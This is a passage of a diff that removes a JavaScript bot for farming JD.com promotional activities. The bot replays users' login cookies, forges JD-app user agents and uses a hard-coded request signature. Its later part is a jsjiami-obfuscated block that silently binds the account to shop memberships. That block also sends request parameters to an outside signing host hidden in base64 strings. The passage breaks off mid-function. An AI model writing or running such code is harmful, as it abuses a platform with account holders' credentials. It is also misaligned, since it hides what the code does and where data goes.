- } - }); - }); -} -function taskaccessLog(function_id, body, isCommon = 0) { - return new Promise((resolve) => { - $.post(taskUrl(function_id, body, isCommon), async (err, resp, data) => { - try { - if (err) { - $.log(err); - } else { - // console.log(resp); - if (resp["headers"]["set-cookie"]) { - cookie = `${originCookie};`; - for (let sk of resp["headers"]["set-cookie"]) { - lz_cookie[sk.split(";")[0].substr(0, sk.split(";")[0].indexOf("="))] = sk.split(";")[0].substr(sk.split(";")[0].indexOf("=") + 1); - } - for (const vo of Object.keys(lz_cookie)) { - cookie += vo + "=" + lz_cookie[vo] + ";"; - } - } - } - } catch (error) { - console.log(error); - } finally { - resolve(); - } - }); - }); -} - -function getAuthorCodeList(url) { - return new Promise((resolve) => { - const options = { - url: `${url}?${new Date()}`, - timeout: 10000, - headers: { - "User-Agent": "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Edg/87.0.4280.88", - }, - }; - $.get(options, async (err, resp, data) => { - try { - if (err) { - // $.log(err) - $.getAuthorCodeListerr = false; - } else { - if (data) data = JSON.parse(data); - $.getAuthorCodeListerr = true; - } - } catch (e) { - $.logErr(e, resp); - data = null; - } finally { - resolve(data); - } - }); - }); -} - -function taskUrl(function_id, body, isCommon) { - return { - url: isCommon ? `https://lzdz1-isv.isvjcloud.com/${function_id}` : `https://lzdz1-isv.isvjcloud.com/dingzhi/${function_id}`, - headers: { - Host: "lzdz1-isv.isvjcloud.com", - Accept: "application/json", - "X-Requested-With": "XMLHttpRequest", - "Accept-Language": "zh-cn", - "Accept-Encoding": "gzip, deflate, br", - "Content-Type": "application/x-www-form-urlencoded", - Origin: "https://lzdz1-isv.isvjcloud.com", - "User-Agent": `jdapp;iPhone;9.5.4;13.6;${$.UUID};network/wifi;ADID/${$.ADID};model/iPhone10,3;addressid/0;appBuild/167668;jdSupportDarkMode/0;Mozilla/5.0 (iPhone; CPU iPhone OS 13_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148;supportJDSHWK/1`, - Connection: "keep-alive", - Referer: $.activityUrl, - Cookie: cookie, - }, - body: body, - }; -} - -function getMyPing() { - let opt = { - url: `https://lzdz1-isv.isvjcloud.com/customer/getMyPing`, - headers: { - Host: "lzdz1-isv.isvjcloud.com", - Accept: "application/json", - "X-Requested-With": "XMLHttpRequest", - "Accept-Language": "zh-cn", - "Accept-Encoding": "gzip, deflate, br", - "Content-Type": "application/x-www-form-urlencoded", - Origin: "https://lzdz1-isv.isvjcloud.com", - "User-Agent": `jdapp;iPhone;9.5.4;13.6;${$.UUID};network/wifi;ADID/${$.ADID};model/iPhone10,3;addressid/0;appBuild/167668;jdSupportDarkMode/0;Mozilla/5.0 (iPhone; CPU iPhone OS 13_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148;supportJDSHWK/1`, - Connection: "keep-alive", - Referer: $.activityUrl, - Cookie: cookie, - }, - body: `userId=${$.activityShopId}&token=${$.token}&fromType=APP&riskType=1`, - }; - return new Promise((resolve) => { - $.post(opt, (err, resp, data) => { - try { - if (err) { - $.log(err); - } else { - if (resp["headers"]["set-cookie"]) { - cookie = `${originCookie}`; - if ($.isNode()) { - for (let sk of resp["headers"]["set-cookie"]) { - cookie = `${cookie}${sk.split(";")[0]};`; - } - } else { - for (let ck of resp["headers"]["Set-Cookie"].split(",")) { - cookie = `${cookie}${ck.split(";")[0]};`; - } - } - } - if (resp["headers"]["Set-Cookie"]) { - cookie = `${originCookie}`; - if ($.isNode()) { - for (let sk of resp["headers"]["set-cookie"]) { - cookie = `${cookie}${sk.split(";")[0]};`; - } - } else { - for (let ck of resp["headers"]["Set-Cookie"].split(",")) { - cookie = `${cookie}${ck.split(";")[0]};`; - } - } - } - if (data) { - data = JSON.parse(data); - if (data.result) { - $.log(`你好:${data.data.nickname}`); - $.pin = data.data.nickname; - $.secretPin = data.data.secretPin; - cookie = `${cookie};AUTH_C_USER=${data.data.secretPin}`; - } else { - $.log(data.errorMessage); - } - } else { - $.log("京东返回了空数据"); - } - } - } catch (error) { - $.log(error); - } finally { - resolve(); - } - }); - }); -} -function getFirstLZCK() { - return new Promise((resolve) => { - $.get( - { - url: $.activityUrl, - headers: { - "user-agent": $.isNode() ? process.env.JD_USER_AGENT ? process.env.JD_USER_AGENT : require("./USER_AGENTS").USER_AGENT : $.getdata("JDUA") ? $.getdata("JDUA") : "jdapp;iPhone;9.4.4;14.3;network/4g;Mozilla/5.0 (iPhone; CPU iPhone OS 14_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148;supportJDSHWK/1", - }, - }, - (err, resp, data) => { - try { - if (err) { - console.log(err); - } else { - if (resp["headers"]["set-cookie"]) { - cookie = `${originCookie}`; - if ($.isNode()) { - for (let sk of resp["headers"]["set-cookie"]) { - cookie = `${cookie}${sk.split(";")[0]};`; - } - } else { - for (let ck of resp["headers"]["Set-Cookie"].split(",")) { - cookie = `${cookie}${ck.split(";")[0]};`; - } - } - } - if (resp["headers"]["Set-Cookie"]) { - cookie = `${originCookie}`; - if ($.isNode()) { - for (let sk of resp["headers"]["set-cookie"]) { - cookie = `${cookie}${sk.split(";")[0]};`; - } - } else { - for (let ck of resp["headers"]["Set-Cookie"].split(",")) { - cookie = `${cookie}${ck.split(";")[0]};`; - } - } - } - } - } catch (error) { - console.log(error); - } finally { - resolve(); - } - } - ); - }); -} -function getToken() { - let opt = { - url: `https://api.m.jd.com/client.action?functionId=isvObfuscator`, - headers: { - Host: "api.m.jd.com", - "Content-Type": "application/x-www-form-urlencoded", - Accept: "*/*", - Connection: "keep-alive", - Cookie: cookie, - "User-Agent": "JD4iPhone/167650 (iPhone; iOS 13.7; Scale/3.00)", - "Accept-Language": "zh-Hans-CN;q=1", - "Accept-Encoding": "gzip, deflate, br", - }, - body: `body=%7B%22url%22%3A%20%22https%3A//lzkj-isv.isvjcloud.com%22%2C%20%22id%22%3A%20%22%22%7D&uuid=hjudwgohxzVu96krv&client=apple&clientVersion=9.4.0&st=1620476162000&sv=111&sign=f9d1b7e3b943b6a136d54fe4f892af05`, - }; - return new Promise((resolve) => { - $.post(opt, (err, resp, data) => { - try { - if (err) { - $.log(err); - } else { - if (data) { - data = JSON.parse(data); - if (data.code === "0") { - $.token = data.token; - } - } else { - $.log("京东返回了空数据"); - } - } - } catch (error) { - $.log(error); - } finally { - resolve(); - } - }); - }); -} -function random(min, max) { - return Math.floor(Math.random() * (max - min)) + min; -} -function getUUID(format = "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx", UpperCase = 0) { - return format.replace(/[xy]/g, function (c) { - var r = (Math.random() * 16) | 0, - v = c == "x" ? r : (r & 0x3) | 0x8; - if (UpperCase) { - uuid = v.toString(36).toUpperCase(); - } else { - uuid = v.toString(36); - } - return uuid; - }); -} -function checkCookie() { - const options = { - url: "https://me-api.jd.com/user_new/info/GetJDUserInfoUnion", - headers: { - Host: "me-api.jd.com", - Accept: "*/*", - Connection: "keep-alive", - Cookie: cookie, - "User-Agent": "Mozilla/5.0 (iPhone; CPU iPhone OS 14_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.2 Mobile/15E148 Safari/604.1", - "Accept-Language": "zh-cn", - Referer: "https://home.m.jd.com/myJd/newhome.action?sceneval=2&ufc=&", - "Accept-Encoding": "gzip, deflate, br", - }, - }; - return new Promise((resolve) => { - $.get(options, (err, resp, data) => { - try { - if (err) { - $.logErr(err); - } else { - if (data) { - data = JSON.parse(data); - if (data.retcode === "1001") { - $.isLogin = false; //cookie过期 - return; - } - if (data.retcode === "0" && data.data.hasOwnProperty("userInfo")) { - $.nickName = data.data.userInfo.baseInfo.nickname; - } - } else { - $.log("京东返回了空数据"); - } - } - } catch (e) { - $.logErr(e); - } finally { - resolve(); - } - }); - }); -} -// prettier-ignore -var _0xod7='jsjiami.com.v6',_0xod7_=['‮_0xod7'],_0x1acd=[_0xod7,'\x53\x33\x4a\x54\x56\x32\x4d\x3d','\x54\x47\x4e\x4c\x62\x6e\x6b\x3d','\x62\x47\x39\x6e','\x63\x47\x46\x79\x63\x32\x55\x3d','\x63\x33\x56\x6a\x59\x32\x56\x7a\x63\x77\x3d\x3d','\x63\x6d\x56\x7a\x64\x57\x78\x30','\x61\x57\x35\x30\x5a\x58\x4a\x6c\x63\x33\x52\x7a\x55\x6e\x56\x73\x5a\x55\x78\x70\x63\x33\x51\x3d','\x62\x33\x42\x6c\x62\x6b\x4e\x68\x63\x6d\x52\x42\x59\x33\x52\x70\x64\x6d\x6c\x30\x65\x55\x6c\x6b','\x61\x57\x35\x30\x5a\x58\x4a\x6c\x63\x33\x52\x7a\x53\x57\x35\x6d\x62\x77\x3d\x3d','\x59\x57\x4e\x30\x61\x58\x5a\x70\x64\x48\x6c\x4a\x5a\x41\x3d\x3d','\x56\x45\x56\x4a\x59\x57\x38\x3d','\x55\x6d\x78\x6d\x59\x32\x4d\x3d','\x63\x45\x39\x31\x52\x6b\x4d\x3d','\x64\x6e\x5a\x75\x57\x45\x4d\x3d','\x62\x33\x64\x32\x5a\x47\x55\x3d','\x59\x33\x70\x4b\x62\x47\x67\x3d','\x51\x55\x64\x59\x59\x30\x6b\x3d','\x54\x30\x4a\x58\x55\x45\x59\x3d','\x56\x57\x6c\x55\x51\x33\x63\x3d','\x59\x6d\x6c\x75\x5a\x46\x64\x70\x64\x47\x68\x57\x5a\x57\x35\x6b\x5a\x58\x49\x3d','\x52\x57\x52\x36\x62\x57\x67\x3d','\x55\x48\x56\x58\x62\x6b\x59\x3d','\x61\x48\x52\x30\x63\x48\x4d\x36\x4c\x79\x39\x68\x63\x47\x6b\x75\x62\x53\x35\x71\x5a\x43\x35\x6a\x62\x32\x30\x76\x59\x32\x78\x70\x5a\x57\x35\x30\x4c\x6d\x46\x6a\x64\x47\x6c\x76\x62\x6a\x38\x3d','\x52\x33\x5a\x75\x55\x6c\x55\x3d','\x52\x6c\x5a\x71\x53\x30\x55\x3d','\x56\x47\x35\x69\x63\x30\x73\x3d','\x61\x6e\x6c\x47\x54\x31\x41\x3d','\x66\x53\x5a\x6a\x61\x47\x46\x75\x62\x6d\x56\x73\x50\x54\x51\x77\x4d\x53\x5a\x79\x5a\x58\x52\x31\x63\x6d\x35\x56\x63\x6d\x77\x39','\x59\x55\x78\x36\x61\x31\x63\x3d','\x56\x6d\x74\x75\x62\x33\x51\x3d','\x54\x56\x6c\x6f\x54\x45\x4d\x3d','\x62\x58\x64\x34\x52\x47\x30\x3d','\x65\x6c\x5a\x70\x59\x57\x34\x3d','\x52\x55\x46\x4a\x51\x6b\x45\x3d','\x53\x57\x70\x7a\x59\x6b\x6f\x3d','\x56\x55\x74\x79\x61\x46\x55\x3d','\x56\x32\x74\x69\x53\x45\x77\x3d','\x54\x46\x4a\x49\x61\x6b\x77\x3d','\x54\x30\x4e\x44\x54\x6e\x63\x3d','\x56\x31\x70\x7a\x57\x56\x6f\x3d','\x56\x33\x4e\x72\x63\x48\x67\x3d','\x61\x56\x42\x6b\x5a\x58\x67\x3d','\x51\x6e\x64\x6c\x55\x31\x63\x3d','\x65\x57\x35\x5a\x63\x58\x49\x3d','\x63\x47\x74\x50\x64\x58\x4d\x3d','\x57\x6d\x56\x5a\x62\x6c\x67\x3d','\x61\x56\x68\x4e\x54\x33\x6b\x3d','\x62\x56\x5a\x33\x65\x56\x67\x3d','\x55\x47\x4a\x50\x51\x55\x49\x3d','\x54\x33\x68\x74\x56\x57\x59\x3d','\x62\x55\x31\x52\x61\x33\x59\x3d','\x53\x57\x4a\x45\x62\x56\x45\x3d','\x59\x6d\x6c\x75\x5a\x46\x64\x70\x64\x47\x68\x57\x5a\x57\x35\x6b\x5a\x58\x4a\x74\x5a\x58\x4e\x7a\x59\x57\x64\x6c','\x62\x57\x56\x7a\x63\x32\x46\x6e\x5a\x51\x3d\x3d','\x5a\x57\x35\x32','\x55\x30\x6c\x48\x54\x6c\x39\x56\x55\x6b\x77\x3d','\x59\x6d\x52\x6e\x63\x30\x30\x3d','\x57\x6b\x74\x34\x53\x6b\x34\x3d','\x59\x30\x56\x51\x63\x6d\x4d\x3d','\x65\x45\x64\x72\x54\x47\x38\x3d','\x5a\x45\x74\x57\x64\x6d\x67\x3d','\x51\x58\x68\x73\x63\x6d\x6f\x3d','\x4f\x47\x46\x6b\x5a\x6d\x49\x3d','\x61\x6d\x52\x66\x63\x32\x68\x76\x63\x46\x39\x74\x5a\x57\x31\x69\x5a\x58\x49\x3d','\x4f\x53\x34\x79\x4c\x6a\x41\x3d','\x61\x6d\x52\x7a\x61\x57\x64\x75\x4c\x6d\x4e\x6d','\x59\x58\x42\x77\x62\x47\x6c\x6a\x59\x58\x52\x70\x62\x32\x34\x76\x61\x6e\x4e\x76\x62\x67\x3d\x3d','\x64\x6c\x6c\x43\x5a\x45\x67\x3d','\x51\x6b\x31\x47\x61\x33\x6b\x3d','\x61\x58\x56\x36\x61\x31\x45\x3d','\x5a\x30\x68\x33\x52\x58\x6f\x3d','\x55\x32\x56\x4d\x52\x6e\x45\x3d','\x52\x57\x35\x59\x65\x6c\x6b\x3d','\x55\x48\x70\x34\x63\x55\x67\x3d','\x54\x6c\x52\x42\x55\x56\x41\x3d','\x61\x30\x56\x78\x65\x6e\x45\x3d','\x61\x6c\x5a\x59\x63\x48\x45\x3d','\x51\x57\x31\x4f\x63\x6b\x6b\x3d','\x63\x57\x6c\x43\x64\x32\x63\x3d','\x5a\x6d\x78\x76\x62\x33\x49\x3d','\x62\x46\x6c\x57\x65\x47\x73\x3d','\x63\x6d\x46\x75\x5a\x47\x39\x74','\x62\x47\x56\x75\x5a\x33\x52\x6f','\x61\x48\x52\x30\x63\x48\x4d\x36\x4c\x79\x39\x6a\x5a\x47\x34\x75\x62\x6e\x6f\x75\x62\x48\x55\x76\x5a\x32\x56\x30\x61\x44\x56\x7a\x64\x41\x3d\x3d','\x52\x47\x5a\x61\x62\x32\x67\x3d','\x57\x45\x4e\x36\x62\x6e\x59\x3d','\x63\x47\x39\x7a\x64\x41\x3d\x3d','\x53\x6b\x64\x4a\x53\x6b\x6f\x3d','\x59\x30\x78\x31\x57\x56\x63\x3d','\x53\x6d\x56\x74\x64\x6b\x67\x3d','\x56\x46\x4e\x6c\x59\x55\x59\x3d','\x5a\x6c\x64\x6d\x54\x31\x51\x3d','\x59\x58\x42\x77\x62\x48\x6b\x3d','\x65\x6b\x39\x49\x64\x45\x67\x3d','\x56\x46\x70\x75\x51\x6d\x6f\x3d','\x62\x47\x39\x6e\x52\x58\x4a\x79','\x61\x30\x64\x42\x55\x55\x51\x3d','\x56\x46\x6c\x48\x57\x48\x6f\x3d','\x59\x58\x42\x70\x4c\x6d\x30\x75\x61\x6d\x51\x75\x59\x32\x39\x74','\x4b\x69\x38\x71','\x61\x32\x56\x6c\x63\x43\x31\x68\x62\x47\x6c\x32\x5a\x51\x3d\x3d','\x65\x6d\x67\x74\x59\x32\x34\x3d','\x5a\x33\x70\x70\x63\x43\x77\x67\x5a\x47\x56\x6d\x62\x47\x46\x30\x5a\x53\x77\x67\x59\x6e\x49\x3d','\x61\x48\x52\x30\x63\x48\x4d\x36\x4c\x79\x39\x68\x63\x47\x6b\x75\x62\x53\x35\x71\x5a\x43\x35\x6a\x62\x32\x30\x76\x59\x32\x78\x70\x5a\x57\x35\x30\x4c\x6d\x46\x6a\x64\x47\x6c\x76\x62\x6a\x39\x68\x63\x48\x42\x70\x5a\x44\x31\x71\x5a\x46\x39\x7a\x61\x47\x39\x77\x58\x32\x31\x6c\x62\x57\x4a\x6c\x63\x69\x5a\x6d\x64\x57\x35\x6a\x64\x47\x6c\x76\x62\x6b\x6c\x6b\x50\x57\x64\x6c\x64\x46\x4e\x6f\x62\x33\x42\x50\x63\x47\x56\x75\x51\x32\x46\x79\x5a\x45\x6c\x75\x5a\x6d\x38\x6d\x59\x6d\x39\x6b\x65\x54\x30\x3d','\x65\x47\x52\x75\x51\x6c\x49\x3d','\x63\x33\x52\x79\x61\x57\x35\x6e\x61\x57\x5a\x35','\x4a\x6d\x4e\x73\x61\x57\x56\x75\x64\x44\x31\x49\x4e\x53\x5a\x6a\x62\x47\x6c\x6c\x62\x6e\x52\x57\x5a\x58\x4a\x7a\x61\x57\x39\x75\x50\x54\x6b\x75\x4d\x69\x34\x77\x4a\x6e\x56\x31\x61\x57\x51\x39\x4f\x44\x67\x34\x4f\x44\x67\x3d','\x55\x6b\x70\x46\x55\x33\x6f\x3d','\x62\x48\x5a\x6c\x64\x6e\x67\x3d','\x59\x31\x68\x71\x63\x6e\x41\x3d','\x61\x6d\x52\x68\x63\x48\x41\x37\x61\x56\x42\x6f\x62\x32\x35\x6c\x4f\x7a\x6b\x75\x4e\x53\x34\x30\x4f\x7a\x45\x7a\x4c\x6a\x59\x37','\x56\x56\x56\x4a\x52\x41\x3d\x3d','\x4f\x32\x35\x6c\x64\x48\x64\x76\x63\x6d\x73\x76\x64\x32\x6c\x6d\x61\x54\x74\x42\x52\x45\x6c\x45\x4c\x77\x3d\x3d','\x51\x55\x52\x4a\x52\x41\x3d\x3d','\x4f\x32\x31\x76\x5a\x47\x56\x73\x4c\x32\x6c\x51\x61\x47\x39\x75\x5a\x54\x45\x77\x4c\x44\x4d\x37\x59\x57\x52\x6b\x63\x6d\x56\x7a\x63\x32\x6c\x6b\x4c\x7a\x41\x37\x59\x58\x42\x77\x51\x6e\x56\x70\x62\x47\x51\x76\x4d\x54\x59\x33\x4e\x6a\x59\x34\x4f\x32\x70\x6b\x55\x33\x56\x77\x63\x47\x39\x79\x64\x45\x52\x68\x63\x6d\x74\x4e\x62\x32\x52\x6c\x4c\x7a\x41\x37\x54\x57\x39\x36\x61\x57\x78\x73\x59\x53\x38\x31\x4c\x6a\x41\x67\x4b\x47\x6c\x51\x61\x47\x39\x75\x5a\x54\x73\x67\x51\x31\x42\x56\x49\x47\x6c\x51\x61\x47\x39\x75\x5a\x53\x42\x50\x55\x79\x41\x78\x4d\x31\x38\x32\x49\x47\x78\x70\x61\x32\x55\x67\x54\x57\x46\x6a\x49\x45\x39\x54\x49\x46\x67\x70\x49\x45\x46\x77\x63\x47\x78\x6c\x56\x32\x56\x69\x53\x32\x6c\x30\x4c\x7a\x59\x77\x4e\x53\x34\x78\x4c\x6a\x45\x31\x49\x43\x68\x4c\x53\x46\x52\x4e\x54\x43\x77\x67\x62\x47\x6c\x72\x5a\x53\x42\x48\x5a\x57\x4e\x72\x62\x79\x6b\x67\x54\x57\x39\x69\x61\x57\x78\x6c\x4c\x7a\x45\x31\x52\x54\x45\x30\x4f\x44\x74\x7a\x64\x58\x42\x77\x62\x33\x4a\x30\x53\x6b\x52\x54\x53\x46\x64\x4c\x4c\x7a\x45\x3d','\x61\x57\x4a\x49\x5a\x48\x45\x3d','\x61\x48\x52\x30\x63\x48\x4d\x36\x4c\x79\x39\x7a\x61\x47\x39\x77\x62\x57\x56\x74\x59\x6d\x56\x79\x4c\x6d\x30\x75\x61\x6d\x51\x75\x59\x32\x39\x74\x4c\x33\x4e\x6f\x62\x33\x42\x6a\x59\x58\x4a\x6b\x4c\x7a\x39\x32\x5a\x57\x35\x6b\x5a\x58\x4a\x4a\x5a\x44\x30\x3d','\x66\x53\x5a\x6a\x61\x47\x46\x75\x62\x6d\x56\x73\x50\x54\x67\x77\x4d\x53\x5a\x79\x5a\x58\x52\x31\x63\x6d\x35\x56\x63\x6d\x77\x39','\x59\x57\x4e\x30\x61\x58\x5a\x70\x64\x48\x6c\x56\x63\x6d\x77\x3d','\x5a\x55\x64\x48\x65\x6e\x67\x3d','\x61\x58\x46\x34\x57\x55\x38\x3d','\x59\x56\x52\x6b\x65\x6d\x55\x3d','\x62\x56\x52\x51\x65\x55\x63\x3d','\x5a\x32\x56\x30','\x6a\x6b\x73\x6a\x45\x69\x48\x61\x6d\x69\x64\x53\x2e\x63\x54\x6f\x6d\x43\x2e\x76\x36\x68\x6c\x45\x45\x56\x50\x75\x56\x3d\x3d'];if(function(_0x47dca4,_0x2e45a0,_0x2d0d38){function _0x358c40(_0x4e0fee,_0x44d395,_0x5f1629,_0x6d2cae,_0x379df8,_0x59c1d4){_0x44d395=_0x44d395>>0x8,_0x379df8='po';var _0x24e0cd='shift',_0x197297='push',_0x59c1d4='‮';if(_0x44d395<_0x4e0fee){while(--_0x4e0fee){_0x6d2cae=_0x47dca4[_0x24e0cd]();if(_0x44d395===_0x4e0fee&&_0x59c1d4==='‮'&&_0x59c1d4['length']===0x1){_0x44d395=_0x6d2cae,_0x5f1629=_0x47dca4[_0x379df8+'p']();}else if(_0x44d395&&_0x5f1629['replace'](/[kEHdSTChlEEVPuV=]/g,'')===_0x44d395){_0x47dca4[_0x197297](_0x6d2cae);}}_0x47dca4[_0x197297](_0x47dca4[_0x24e0cd]());}return 0xdaf2e;};return _0x358c40(++_0x2e45a0,_0x2d0d38)>>_0x2e45a0^_0x2d0d38;}(_0x1acd,0x1d5,0x1d500),_0x1acd){_0xod7_=_0x1acd['length']^0x1d5;};function _0x27de(_0x4ab799,_0x2148e0){_0x4ab799=~~'0x'['concat'](_0x4ab799['slice'](0x1));var _0x38aa70=_0x1acd[_0x4ab799];if(_0x27de['HEabFd']===undefined&&'‮'['length']===0x1){(function(){var _0x48587b=function(){var _0x226fa7;try{_0x226fa7=Function('return\x20(function()\x20'+'{}.constructor(\x22return\x20this\x22)(\x20)'+');')();}catch(_0x302471){_0x226fa7=window;}return _0x226fa7;};var _0x2dcb25=_0x48587b();var _0x5d0b0e='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';_0x2dcb25['atob']||(_0x2dcb25['atob']=function(_0x41138d){var _0x37290e=String(_0x41138d)['replace'](/=+$/,'');for(var _0x1da2f9=0x0,_0x27e844,_0x496c4d,_0x55ec30=0x0,_0x46993b='';_0x496c4d=_0x37290e['charAt'](_0x55ec30++);~_0x496c4d&&(_0x27e844=_0x1da2f9%0x4?_0x27e844*0x40+_0x496c4d:_0x496c4d,_0x1da2f9++%0x4)?_0x46993b+=String['fromCharCode'](0xff&_0x27e844>>(-0x2*_0x1da2f9&0x6)):0x0){_0x496c4d=_0x5d0b0e['indexOf'](_0x496c4d);}return _0x46993b;});}());_0x27de['ciicrd']=function(_0x35e622){var _0x1ca022=atob(_0x35e622);var _0x460af0=[];for(var _0x27de2b=0x0,_0x1b5b31=_0x1ca022['length'];_0x27de2b<_0x1b5b31;_0x27de2b++){_0x460af0+='%'+('00'+_0x1ca022['charCodeAt'](_0x27de2b)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(_0x460af0);};_0x27de['qeLOEi']={};_0x27de['HEabFd']=!![];}var _0x4e1a4f=_0x27de['qeLOEi'][_0x4ab799];if(_0x4e1a4f===undefined){_0x38aa70=_0x27de['ciicrd'](_0x38aa70);_0x27de['qeLOEi'][_0x4ab799]=_0x38aa70;}else{_0x38aa70=_0x4e1a4f;}return _0x38aa70;};function getShopOpenCardInfo(_0x2dfe13,_0x2a9c59){var _0x169e2b={'\x69\x71\x78\x59\x4f':function(_0x237960,_0x2865f7){return _0x237960===_0x2865f7;},'\x61\x54\x64\x7a\x65':_0x27de('‮0'),'\x6d\x54\x50\x79\x47':function(_0x5db734){return _0x5db734();},'\x78\x64\x6e\x42\x52':function(_0x27ef1f,_0x2696d1){return _0x27ef1f(_0x2696d1);},'\x52\x4a\x45\x53\x7a':_0x27de('‫1'),'\x6c\x76\x65\x76\x78':_0x27de('‫2'),'\x63\x58\x6a\x72\x70':_0x27de('‫3'),'\x69\x62\x48\x64\x71':_0x27de('‮4'),'\x65\x47\x47\x7a\x78':_0x27de('‫5')};let _0x4540b3={'\x75\x72\x6c':_0x27de('‮6')+_0x169e2b[_0x27de('‮7')](encodeURIComponent,JSON[_0x27de('‫8')](_0x2dfe13))+_0x27de('‮9'),'\x68\x65\x61\x64\x65\x72\x73':{'\x48\x6f\x73\x74':_0x169e2b[_0x27de('‮a')],'\x41\x63\x63\x65\x70\x74':_0x169e2b[_0x27de('‮b')],'\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e':_0x169e2b[_0x27de('‫c')],'\x43\x6f\x6f\x6b\x69\x65':cookie,'User-Agent':_0x27de('‫d')+$[_0x27de('‫e')]+_0x27de('‫f')+$[_0x27de('‫10')]+_0x27de('‫11'),'Accept-Language':_0x169e2b[_0x27de('‫12')],'\x52\x65\x66\x65\x72\x65\x72':_0x27de('‮13')+_0x2a9c59+_0x27de('‮14')+_0x169e2b[_0x27de('‮7')](encodeURIComponent,$[_0x27de('‫15')]),'Accept-Encoding':_0x169e2b[_0x27de('‮16')]}};return new Promise(_0x24d014=>{var _0x45d140={'\x4b\x72\x53\x57\x63':function(_0x564cc4,_0x316683){return _0x169e2b[_0x27de('‫17')](_0x564cc4,_0x316683);},'\x4c\x63\x4b\x6e\x79':_0x169e2b[_0x27de('‫18')],'\x54\x45\x49\x61\x6f':function(_0x32cebc){return _0x169e2b[_0x27de('‫19')](_0x32cebc);}};$[_0x27de('‫1a')](_0x4540b3,(_0x497df1,_0x18ad2f,_0x1d037c)=>{if(_0x45d140[_0x27de('‮1b')](_0x45d140[_0x27de('‮1c')],_0x45d140[_0x27de('‮1c')])){try{if(_0x497df1){console[_0x27de('‫1d')](_0x497df1);}else{res=JSON[_0x27de('‫1e')](_0x1d037c);if(res[_0x27de('‮1f')]){if(res[_0x27de('‮20')][_0x27de('‮21')]){$[_0x27de('‮22')]=res[_0x27de('‮20')][_0x27de('‮21')][0x0][_0x27de('‫23')][_0x27de('‮24')];}}}}catch(_0x487efd){console[_0x27de('‫1d')](_0x487efd);}finally{_0x45d140[_0x27de('‮25')](_0x24d014);}}else{console[_0x27de('‫1d')](_0x497df1);}});});}async function bindWithVender(_0x4bf9aa,_0x5a230c){var _0x5180ad={'\x4d\x59\x68\x4c\x43':function(_0x396660){return _0x396660();},'\x6d\x77\x78\x44\x6d':function(_0x4b2169,_0x405a0d){return _0x4b2169!==_0x405a0d;},'\x7a\x56\x69\x61\x6e':_0x27de('‫26'),'\x45\x41\x49\x42\x41':_0x27de('‫27'),'\x49\x6a\x73\x62\x4a':function(_0xcf4ea9,_0x3221b8){return _0xcf4ea9===_0x3221b8;},'\x55\x4b\x72\x68\x55':_0x27de('‫28'),'\x57\x6b\x62\x48\x4c':_0x27de('‫29'),'\x4c\x52\x48\x6a\x4c':_0x27de('‮2a'),'\x4f\x43\x43\x4e\x77':_0x27de('‫2b'),'\x57\x5a\x73\x59\x5a':_0x27de('‫2c'),'\x57\x73\x6b\x70\x78':_0x27de('‮2d'),'\x45\x64\x7a\x6d\x68':function(_0x148959,_0x176008,_0x319ba8){return _0x148959(_0x176008,_0x319ba8);},'\x50\x75\x57\x6e\x46':_0x27de('‮2e'),'\x47\x76\x6e\x52\x55':_0x27de('‫1'),'\x46\x56\x6a\x4b\x45':_0x27de('‫2'),'\x54\x6e\x62\x73\x4b':_0x27de('‫3'),'\x6a\x79\x46\x4f\x50':_0x27de('‮4'),'\x61\x4c\x7a\x6b\x57':function(_0x3768db,_0x1db8ba){return _0x3768db(_0x1db8ba);},'\x56\x6b\x6e\x6f\x74':_0x27de('‫5')};return h5st=await _0x5180ad[_0x27de('‮2f')](geth5st,_0x5180ad[_0x27de('‮30')],_0x4bf9aa),opt={'\x75\x72\x6c':_0x27de('‮31')+h5st,'\x68\x65\x61\x64\x65\x72\x73':{'\x48\x6f\x73\x74':_0x5180ad[_0x27de('‮32')],'\x41\x63\x63\x65\x70\x74':_0x5180ad[_0x27de('‫33')],'\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e':_0x5180ad[_0x27de('‮34')],'\x43\x6f\x6f\x6b\x69\x65':cookie,'User-Agent':_0x27de('‫d')+$[_0x27de('‫e')]+_0x27de('‫f')+$[_0x27de('‫10')]+_0x27de('‫11'),'Accept-Language':_0x5180ad[_0x27de('‫35')],'\x52\x65\x66\x65\x72\x65\x72':_0x27de('‮13')+_0x5a230c+_0x27de('‮36')+_0x5180ad[_0x27de('‮37')](encodeURIComponent,$[_0x27de('‫15')]),'Accept-Encoding':_0x5180ad[_0x27de('‫38')]}},new Promise(_0x2c2848=>{var _0x1f470d={'\x69\x50\x64\x65\x78':function(_0x4c0bea){return _0x5180ad[_0x27de('‫39')](_0x4c0bea);},'\x42\x77\x65\x53\x57':function(_0x240905,_0x2118e5){return _0x5180ad[_0x27de('‫3a')](_0x240905,_0x2118e5);},'\x79\x6e\x59\x71\x72':_0x5180ad[_0x27de('‫3b')],'\x70\x6b\x4f\x75\x73':_0x5180ad[_0x27de('‮3c')],'\x5a\x65\x59\x6e\x58':function(_0x2ff734,_0x50b6d9){return _0x5180ad[_0x27de('‮3d')](_0x2ff734,_0x50b6d9);},'\x69\x58\x4d\x4f\x79':_0x5180ad[_0x27de('‫3e')],'\x6d\x56\x77\x79\x58':function(_0x43cb7f,_0x5f0fa8){return _0x5180ad[_0x27de('‮3d')](_0x43cb7f,_0x5f0fa8);},'\x50\x62\x4f\x41\x42':_0x5180ad[_0x27de('‫3f')],'\x4f\x78\x6d\x55\x66':_0x5180ad[_0x27de('‫40')],'\x49\x62\x44\x6d\x51':_0x5180ad[_0x27de('‫41')],'\x62\x64\x67\x73\x4d':_0x5180ad[_0x27de('‫42')],'\x5a\x4b\x78\x4a\x4e':_0x5180ad[_0x27de('‮43')]};$[_0x27de('‫1a')](opt,(_0x311afb,_0x3b7aab,_0x4c2873)=>{var 